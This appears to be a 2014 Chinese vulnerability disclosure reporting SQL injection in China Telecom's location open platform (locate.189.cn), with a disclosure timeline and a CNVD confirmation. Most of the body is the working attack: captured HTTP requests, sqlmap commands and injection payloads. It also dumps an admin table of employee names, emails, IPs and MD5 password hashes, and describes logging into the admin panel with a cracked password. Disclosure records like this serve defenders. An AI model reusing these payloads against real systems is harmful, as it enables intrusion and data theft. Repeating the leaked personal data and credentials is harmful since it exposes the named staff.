2014-09-13: 细节已通知厂商并且等待厂商处理中 2014-09-18: 厂商已经确认,细节仅向厂商公开 2014-09-28: 细节向核心白帽子及相关领域专家公开 2014-10-08: 细节向普通白帽子公开 2014-10-18: 细节向实习白帽子公开 2014-10-28: 细节向公众公开
中国电信某开放平台SQL注射
http://locate.189.cn/ 中国电信定位开放平台 注册页检查邮箱可用行这个接口存在SQL注射
POST /site/register/check HTTP/1.0x-requested-with: XMLHttpRequestAccept-Language: zh-cnReferer: http://locate.189.cn:7070/site/registerAccept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8UA-CPU: x86Proxy-Connection: Keep-AliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: locate.189.cn:7070Content-Length: 44Pragma: no-cacheCookie: PHPSESSID=8ul2t2fc5tioh61b43tfefrhq4type=email&email=crtest%401.com
sqlmap.py -r e:/2.txt --dbs --is-dba --threads=10
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: email Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: type=email&email=crtest@1.com' RLIKE (SELECT (CASE WHEN (3413=3413) THEN 0x63727465737440312e636f6d ELSE 0x28 END)) AND 'tfyt'='tfyt Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: type=email&email=crtest@1.com'; SELECT SLEEP(5)-- ---web application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11current user is DBA: Trueavailable databases [6]:[*] haobai_tongji[*] haobai_yunwei[*] information_schema[*] mysql[*] performance_schema[*] test
sqlmap.py -r e:/2.txt --dump -T admin_user -D haobai_yunwei
id,role_id,name,email,status,lastip,password,lastvisit,create_time,last_modified1,0,admin,admin,0,116.228.55.237,<blank>,1374023039,0,02,1,柴春轶,chaichunyi@besttone.com.cn,1,116.228.55.237,4de72e61c2a429799f461d19b9f7053d,1394416723,1373969394,03,2,郭利涛,guolitao@besttone.com.cn,0,116.228.55.237,85f903ac17ad994ffad5812f083111e0,1379385643,1374022906,14053912904,1,李强,liqiang_zl@besttone.com.cn,1,116.228.55.237,ea7e67bdf788df28f10c5f2c4b11e3dc,1390890696,1374022932,13793857755,1,程志林,chengzhilin@besttone.com.cn,1,116.228.55.237,37e69763ffeb6a6400dba75c100e6d90,1409538260,1374022956,13793857626,3,寇毅,kouyi@besttone.com.cn,1,116.228.55.237,60eb03369f273fc99639859da40f618a,1378433388,1374022982,13741333737,6,沈谦,shenqian@besttone.com.cn,1,116.228.55.237,2ed704d4a4846bddeb296342689d8117,1396507529,1374029645,08,1,陈军,chenjun_wz@besttone.com.cn,1,27.128.86.38,e10adc3949ba59abbe56e057f20f883e,1410048662,1374029670,13843046589,2,程耀宗,chengyaozong@besttone.com.cn,1,116.228.55.237,e10adc3949ba59abbe56e057f20f883e,1394418942,1386897538,0
用 chenjun_wz@besttone.com.cn 123456 登录后台 http://locate.189.cn/admin/admin/login
登录后台后发现这地址也能注入,支持UNION
GET /admin/user/view/id/1* HTTP/1.1Host: locate.189.cnProxy-Connection: keep-aliveCache-Control: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Pragma: no-cacheUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: PHPSESSID=c46befgs7aseir16k9hcoct7m0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://locate.189.cn:80/admin/user/view/id/1' AND 1505=1505 AND 'GFjG'='GFjG Type: UNION query Title: MySQL UNION query (NULL) - 24 columns Payload: http://locate.189.cn:80/admin/user/view/id/1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170776271,0x6955654457624b464a70,0x7172726471),NULL,NULL,NULL,NULL,NULL,NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://locate.189.cn:80/admin/user/view/id/1'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://locate.189.cn:80/admin/user/view/id/1' AND SLEEP(5) AND 'dJvZ'='dJvZ---web application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11available databases [6]:[*] haobai_tongji[*] haobai_yunwei[*] information_schema[*] mysql[*] performance_schema[*] test
电信更专业
危害等级:高
漏洞Rank:15
确认时间:2014-09-18 08:18
CNVD确认并复现所述情况,已经转由CNCERT通报给中国电信集团公司处置。按多个注入点综合评分,rank 15
暂无